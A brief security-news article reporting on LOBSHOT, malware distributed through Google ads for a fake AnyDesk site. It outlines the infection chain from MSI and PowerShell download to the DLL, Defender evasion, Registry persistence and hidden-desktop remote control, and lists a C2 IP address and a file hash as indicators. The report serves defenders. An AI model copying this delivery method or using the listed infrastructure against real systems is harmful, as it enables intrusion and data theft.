New LOBSHOT Malware Deployed Via Google Ads

New LOBSHOT Malware Deployed Via Google Ads

Cybersecurity researchers have discovered a new malware, called ‘LOBSHOT,’ distributed through Google ads.

What is LOBSHOT Malware ?

The ads, which promoted the legitimate AnyDesk remote management software, led users to a fake AnyDesk site at amydeecke[.]website. This site pushed a malicious MSI file that executed a PowerShell command to download a DLL from download-cdn[.]com, a domain previously associated with the TA505/Clop ransomware gang. However, it is unclear if TA505 is still using the domain as it had changed ownership in the past.

Once executed, the LOBSHOT malware checks if Microsoft Defender is running, and if detected, terminates execution to prevent detection. If Defender is not detected, the malware configures Registry entries to start automatically when logging in to Windows and then transmits system information from the infected device, including running processes.

The downloaded DLL file contains LOBSHOT malware, which is saved in the C:\ProgramData directory and then executed using RunDLL32[.]exe.

LOBSHOT deploys an hVNC module that allows the threat actors to control the hidden desktop using their mouse and keyboard as if they were in front of it. With this kind of access, the threat actors have complete control over the device, allowing them to execute commands, steal data, and even deploy further malware payloads.

IOCS

IndicatorTypeReference
95.217.125.200IP AddressLOBSHOT C2
e4ea88887753a936eaf3361dcc00380b88b0c210dcbde24f8f7ce27991856bf6SHA-256LOBSHOT

Follow Us on: Twitter, InstagramFacebook to get the latest security news!

About the Author:

FirstHackersNews- Identifies Security

Leave A Comment

Subscribe to our newsletter to receive security tips everday!